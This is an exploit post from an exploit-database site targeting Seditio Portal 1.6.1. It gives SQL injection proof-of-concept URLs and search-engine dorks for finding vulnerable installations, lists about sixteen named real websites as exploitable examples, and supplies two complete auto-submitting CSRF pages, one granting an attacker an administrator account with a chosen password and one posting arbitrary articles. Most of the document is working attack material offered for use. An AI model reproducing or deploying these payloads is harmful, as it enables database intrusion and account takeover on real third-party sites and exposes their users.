0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Seditio Portal Multiple Vulnerabilities
+---------------------------------------------------------------------------------------------------------------------------------------+ # Exploit Title : Seditio Portal Multiple Vulnerabilities(CSRF Add admin + add new article /Sql InjecTion) # Date : 05-april-2012 # Author : khaled-Ham # Software link : http://www.neocrome.net/files/code/seditio-build161.rar # Version : 1.6.1 # Category : WebApps # Tested on : Windows 7/xp/Ubuntu 10.10 # Thanks : http://1337day.com all Inj3ct0r Member & http://exploit-db.com +---------------------------------------------------------------------------------------------------------------------------------------+ 1) First File Sql Vuln : /portal/list.php D0rk : inurl:"/list.php?c=" P0C : http://127.0.0.1/<PATH>/list.php?c=news&o=&p=&s=title&w= <- add any number : xD http://127.0.0.1/<PATH>/list.php?c=news&o=&p=&s=title&w=1 <:- [ SQL ] 2) Secnd File Sql Vuln : /portal/forums.php D0rk : inurl:"/forums.php?m=" P0C : http://127.0.0.1/<PATH>/forums.php?m=topics&o=viewcount&s=2&w= <- add any number : xD http://127.0.0.1/<PATH>/forums.php?m=topics&o=viewcount&s=2&w=1 < <:- [ SQL ] 3) Site Demo : http://www.armaholic.com/list.php?c=news&o=&p=&s=title&w=1 <:- [ SQL ] http://www.airlinercafe.com/list.php?c=news&o=&p=&s=title&w=1 <:- [ SQL ] http://flashtro.com/list.php?c=news&o=&p=&s=title&w=1 <:- [ SQL ] http://www.airfighters.com/forums.php?m=topics&o=viewcount&s=2&w=1 <:- [ SQL ] http://www.clubbersguide.com.mk/forums.php?m=topics&o=viewcount&s=2&w=1 <:- [ SQL ] http://tgt.vstanced.com/forums.php?m=topics&o=viewcount&s=2&w=1 <:- [ SQL ] http://flashtro.com/forums.php?m=topics&o=viewcount&s=2&w=1 <:- [ SQL ] http://wearemassillon.com/forums.php?m=topics&o=viewcount&s=2&w=1 <:- [ SQL ] http://www.bellspalsy.net/forums.php?m=topics&o=viewcount&s=2&w=1 <:- [ SQL ] http://www.pspdemocenter.com/list.php?c=news&o=&p=&s=title&w=1 <:- [ SQL ] http://www.livid.me.uk/list.php?c=news&o=&p=&s=title&w=1 <:- [ SQL ] http://www.saripkro.ru/list.php?c=news&o=&p=&s=title&w=1 <:- [ SQL ] http://www.artscroll.ru/list.php?c=news&o=&p=&s=title&w=1 <:- [ SQL ] http://www.pure-graphics.org/list.php?c=news&o=&p=&s=title&w=1 <:- [ SQL ] http://subs.com.ru/list.php?c=news&o=&p=&s=title&w=1 <:- [ SQL ] http://riddleofsteel.net/list.php?c=news&o=&p=&s=title&w=1 <:- [ SQL ] 4) CSRF Add Admin (Edit user ) : <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title> CSRF Add Admin (edit admin) By : Khaled-ham </title> </head> <body onload="javascript:fireForms()"> <script language="JavaScript"> var pauses = new Array( "60","60","420","690","410","430","570","2340" ); function pausecomp(millis) { var date = new Date(); var curDate = null; do { curDate = new Date(); }while(curDate-date < millis);}function fireForms() {var count = 8;var i=0;for(i=0; i<count; i++){document.forms[i].submit();pausecomp(pauses[i]);}} </script> <H2>CSRF Add Admin (edit admin) By : Khaled-ham</H2> <form method="POST" name="form0" action="http://<CHANGE IT >/<PATH>/users.php?m=edit&a=update&x=12758D&id=14"> <input type="hidden" name="id" value="14"/> <input type="hidden" name="rusername" value="khaled-ham"/> <---------- Change it , put your new Usrename <input type="hidden" name="rusermaingrp" value="5"/> <input type="hidden" name="rusergroupsms[5]" value="on"/> <input type="hidden" name="rusercountry" value="00"/> <input type="hidden" name="ruserlocation" value=""/> <input type="hidden" name="rusertimezone" value="0"/> <input type="hidden" name="ruserskin" value="artic"/> <input type="hidden" name="ruserlang" value="en"/> <input type="hidden" name="ruseravatar" value=""/> <input type="hidden" name="rusersignature" value=""/> <input type="hidden" name="rusernewpass" value=" Your Pass "/> <---------- Change it , put your new password <input type="hidden" name="ruseremail" value="acunetix_wvs_invalid_filename"/> <input type="hidden" name="ruserhideemail" value="1"/> <input type="hidden" name="ruserpmnotify" value="1"/> <input type="hidden" name="ruserwebsite" value=""/> <input type="hidden" name="ryear" value="0"/> <input type="hidden" name="rmonth" value="0"/> <input type="hidden" name="rday" value="0"/> <input type="hidden" name="ruseroccupation" value=""/> <input type="hidden" name="rusergender" value="U"/> <input type="hidden" name="rusertext" value=""/> <input type="hidden" name="ruserdelete" value="0"/> <input type="hidden" name="x" value="12758D"/> </form> </body> </html> 5) CSRF Add Article : <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title> CSRF Add Article By : khaled-ham </title> </head> <body onload="javascript:fireForms()"> <script language="JavaScript"> var pauses = new Array( "30","40","560","630","400","1020","3400","670" ); function pausecomp(millis) {var date = new Date();var curDate = null; do { curDate = new Date(); } while(curDate-date < millis);}function fireForms() {var count = 8; var i=0;for(i=0; i<count; i++){document.forms[i].submit();pausecomp(pauses[i]);}} </script> <H2> CSRF Add Article By : khaled-ham </H2> <form method="POST" name="form0" action="http://CHANGE IT/<PATH>/page.php?m=add&a=add"> <input type="hidden" name="newpagecat" value="articles"/> <input type="hidden" name="newpagetitle" value="Hack Test2"/> <------ Edit title <input type="hidden" name="newpagedesc" value="Hack Test2"/> <- ------Edit <input type="hidden" name="newpageauthor" value="khaled-ham2"/> < ---------Edit <input type="hidden" name="newpagekey" value=""/> <input type="hidden" name="newpagealias" value=""/> <input type="hidden" name="ryear_beg" value="2012"/> <input type="hidden" name="rmonth_beg" value="4"/> <input type="hidden" name="rday_beg" value="2"/> <input type="hidden" name="rhour_beg" value="13"/> <input type="hidden" name="rminute_beg" value="15"/> <input type="hidden" name="ryear_exp" value="2028"/> <input type="hidden" name="rmonth_exp" value="12"/> <input type="hidden" name="rday_exp" value="31"/> <input type="hidden" name="rhour_exp" value="15"/> <input type="hidden" name="rminute_exp" value="0"/> <input type="hidden" name="newpagetext" value="Hiiiiiiiiiiii"/> <input type="hidden" name="newpagefile" value="0"/> <input type="hidden" name="newpageurl" value=""/> <input type="hidden" name="newpagesize" value=""/> <input type="hidden" name="x" value="12758D"/> </form> </body> </html> +----------------[!Expl01t3d By : Expl0!Ts !]-------------------------+ # Greets T0 : robert miles & Yasser X-man & Waille allane .. # sec4ever.com & Dz4all.com & v4-team.com .... +------------------------------------------------------------------------+ ./The EnD # 0day.today [2024-09-28] #